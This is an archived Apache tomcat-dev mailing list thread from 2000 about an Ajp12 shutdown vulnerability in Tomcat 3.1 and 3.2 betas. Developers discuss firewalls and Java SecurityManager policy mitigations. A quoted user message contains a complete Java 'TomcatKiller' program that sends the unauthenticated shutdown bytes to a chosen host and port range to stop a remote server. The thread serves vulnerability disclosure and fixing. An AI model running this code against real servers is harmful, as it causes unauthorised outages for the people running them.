tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Glenn Nielsen <gl...@voyager.apg.more.net>
Subject Re: Tomcat Security Vulnerability
Date Fri, 06 Oct 2000 15:11:13 GMT
Use of the Java SecurityManager requires a JVM version >= 1.2.
And we are still committed to shipping a version of Tomcat that
compiles/runs under JVM 1.1.x.  So I don't think we should setup
the security manager by default.  We might be able to provide an
example server.xml and tomcat.policy file.  I might have to make
some minor changes to the tomcat_security.html docs from 3.3 so
that it matches the 3.2 release.

I have not been playing around with the 3.2 release branch, only
the 3.3dev branch.  I'll get 3.2 release and do a final test of
configuring/using the security manager and update the tomcat_security.html
file for the 3.2 release.

Regards,

Glenn

Michael Percy wrote:
> 
> Then we need to get all the latest (applicable) docs into the 3.2 release...
> and get everyone off of 3.1 and onto 3.2 ASAP. Possibly configure Tomcat to
> build with this packet filtering on the standard port(s) by default?
> 
> Regards,
> Mike
> 
> > -----Original Message-----
> > From: Glenn Nielsen [mailto:glenn@voyager.apg.more.net]
> > Sent: Thursday, October 05, 2000 5:20 PM
> > To: tomcat-dev@jakarta.apache.org
> > Subject: Re: Tomcat Security Vulnerability
> >
> >
> > If you checkout the 3.3dev version from CVS you will find a
> > link in the
> > docs to tomcat_security.html.  This page documents how to use Tomcat
> > with the java security manager.  In that doc it shows an
> > example of how
> > to configure a tomcat.policy file to do IP filtering of where
> > tomcat will
> > accept requests from on port 8007 using the java security manager.
> >
> > As of tomcat 3.2, support for the java security manager has
> > been added.
> >
> > Regards,
> >
> > Glenn
> >
> > Michael Percy wrote:
> > >
> > > All,
> > > Since I am uncertain how many of you check the tomcat-user
> > list often, and I
> > > am not personally a Java developer, I wanted to get you all
> > in the loop on
> > > this (and hopefully get some discussion going on a
> > solution). What I am
> > > talking about is the "Tomcat Killer" thread on tomcat-user
> > over the past
> > > hour. I have pasted in the mentioned thread below, in hopes
> > that the people
> > > who can do somthing about it (the developers) will have
> > comments on it. I am
> > > also curious as to whether or not ajpv13 is susceptible to
> > this kind of
> > > attack, and am not sure how to go about finding out.
> > >
> > > Regards,
> > >
> > > Michael Percy
> > > QA Automation Eng.
> > > Portera Systems
> > >
> > > > -----Original Message-----
> > > > From: Michael Percy [mailto:mpercy@portera.com]
> > > > Sent: Thursday, October 05, 2000 1:36 PM
> > > > To: 'tomcat-user@jakarta.apache.org'
> > > > Subject: RE: Tomcat Killer
> > > >
> > > >
> > > > I'd like to point out that many people who wish to run Tomcat
> > > > (at home, on a
> > > > LAN, etc.) do not have a spare machine/router to filter
> > > > packets. Plus, many
> > > > setups include multiple ports on which different connectors
> > > > run (to keep
> > > > configurations separate, etc.) so one cannot just firewall
> > > > 8007 and proclaim
> > > > all is well. This is very dangerous and should be
> > > > changed/patched/upgraded!
> > > > If Tomcat requires a firewall to be run safely, then it is
> > > > NOT a secure
> > > > product (it relies on the security of other, unrelated people and
> > > > products!). This must be taken care of.
> > > >
> > > > On a related note, does anyone know if the JNI connector is
> > > > susceptible to
> > > > this? If not, then this can be a short-term workaround (does
> > > > it work yet?).
> > > >
> > > >
> > > > Regards,
> > > >
> > > > Michael Percy
> > > > QA Automation Eng.
> > > > Portera Systems
> > > >
> > > >
> > > > > -----Original Message-----
> > > > > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com]
> > > > > Sent: Thursday, October 05, 2000 1:27 PM
> > > > > To: 'tomcat-user@jakarta.apache.org'
> > > > > Subject: RE: Tomcat Killer
> > > > >
> > > > >
> > > > > You would think that has long as your firewall only allows
> > > > > access to port 80
> > > > > and or 8080 and not 8007 then you would be fine.  Nice
> > find though.
> > > > >
> > > > > Josh
> > > > >
> > > > > -----Original Message-----
> > > > > From: Sean Schofield [mailto:sean@schof.com]
> > > > > Sent: Thursday, October 05, 2000 1:23 PM
> > > > > To: tomcat-user@jakarta.apache.org
> > > > > Subject: Re: Tomcat Killer
> > > > >
> > > > >
> > > > > Cool find!
> > > > >
> > > > > Couldn't this be protected against by a firewall filtering
> > > > > incoming traffic
> > > > > so both Apache and Tomcat are behind a firewall to the
> > > > Intrenet and a
> > > > > another firewall between these servers and the LAN?  Then you
> > > > > would only
> > > > > have to worry about other servlets, etc. within the firewall
> > > > > messing things
> > > > > up.  And even then I think you need root to create sockets
> > > > don't you?
> > > > >
> > > > > Should this be posted to Bugtraq?
> > > > >
> > > > > - schof
> > > > >
> > > > > At 12:51 PM 10/5/00 -0700, you wrote:
> > > > >
> > > > > >Hi all, just a word of warning about Tomcat 3.1 and
> > from what I can
> > > > > >tell, 3.2beta4.  Looking at the source code, if you're
> > using Ajp12 for
> > > > > >the Apache-Tomcat comms protocol, be aware that the
> > "Stop Tomcat"
> > > > > >batch/shell file does its job by sending "exit please" bytes
to
> > > > > >Tomcat.  It doesn't take much to spoof this, here's my
> > TomcatKiller
> > > > > >class below.  Just guess a host and port which may have Tomcat
> > > > > >running, and over it goes...
> > > > > >
> > > > > >I patched the sources so hopefully it won't happen to me ;)
> > > > > >
> > > > > >
> > > > > >import java.net.*;
> > > > > >import java.io.*;
> > > > > >
> > > > > >public class TomcatKiller {
> > > > > >
> > > > > >         static public void main( String[] args ) {
> > > > > >
> > > > > >                 final byte SIGNAL = (byte)254;
> > > > > >                 final byte BYEBYE = (byte)15;
> > > > > >                 byte[] msg = { SIGNAL, BYEBYE };
> > > > > >
> > > > > >                 int min = 8007, max = 8007;
> > > > > >                 String host = args[0];
> > > > > >
> > > > > >                 try {
> > > > > >                         if( args.length > 1 )
> > > > > >                                 min = max =
> > > > > Integer.parseInt( args[1] );
> > > > > >                         if( args.length > 2 )
> > > > > >                                 max =
> > Integer.parseInt( args[2] );
> > > > > >                         if( min > max ) {
> > > > > >                                 int tmp = min;
> > > > > >                                 min = max;
> > > > > >                                 max = tmp;
> > > > > >                         }
> > > > > >                         for( int i = min; i <= max; i++ )
{
> > > > > >                                 try {
> > > > > >                                         Socket s = new
> > > > > Socket( host, i );
> > > > > >                                         OutputStream os =
> > > > > > s.getOutputStream();
> > > > > >                                         os.write( msg );
> > > > > >                                         os.flush();
> > > > > >                                         break;
> > > > > >                                 } catch(
> > ConnectException ce ) {
> > > > > >                                         System.err.println(
> > > > > "conn refused
> > > > > > " + i );
> > > > > >                                 } catch( IOException ioe ) {
> > > > > >                                         ioe.printStackTrace();
> > > > > >                                         break;
> > > > > >                                 }
> > > > > >                         }
> > > > > >                 } catch( Exception e ) {
> > > > > >                         e.printStackTrace();
> > > > > >                         System.exit( 1 );
> > > > > >                 }
> > > > > >         }
> > > > > >}
> > > > > >
> > > > > >// eof
> > > > > >
> > > > > >
> > > > > >stu
> > > > > >
> > > > > >
> > > > > >--
> > > > > >Stuart Maclean, Research Associate
> > > > > >University of Washington
> > > > > >ITS Research Program, College of Engineering
> > > > > >Box 352500
> > > > > >Seattle, WA 98195-2500
> > > > > >Tel: (206) 543-0637
> > > > > >http://www.its.washington.edu
> > > > >
> > > >
> > >
> > >
> > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
> > > For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org
> >
> > --
> > ----------------------------------------------------------------------
> > Glenn Nielsen             glenn@more.net | /* Spelin donut madder    |
> > MOREnet System Programming               |  * if iz ina coment.      |
> > Missouri Research and Education Network  |  */                       |
> > ----------------------------------------------------------------------
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
> > For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org
> >
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
> For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org

-- 
----------------------------------------------------------------------
Glenn Nielsen             glenn@more.net | /* Spelin donut madder    |
MOREnet System Programming               |  * if iz ina coment.      |
Missouri Research and Education Network  |  */                       |
----------------------------------------------------------------------

Mime
View raw message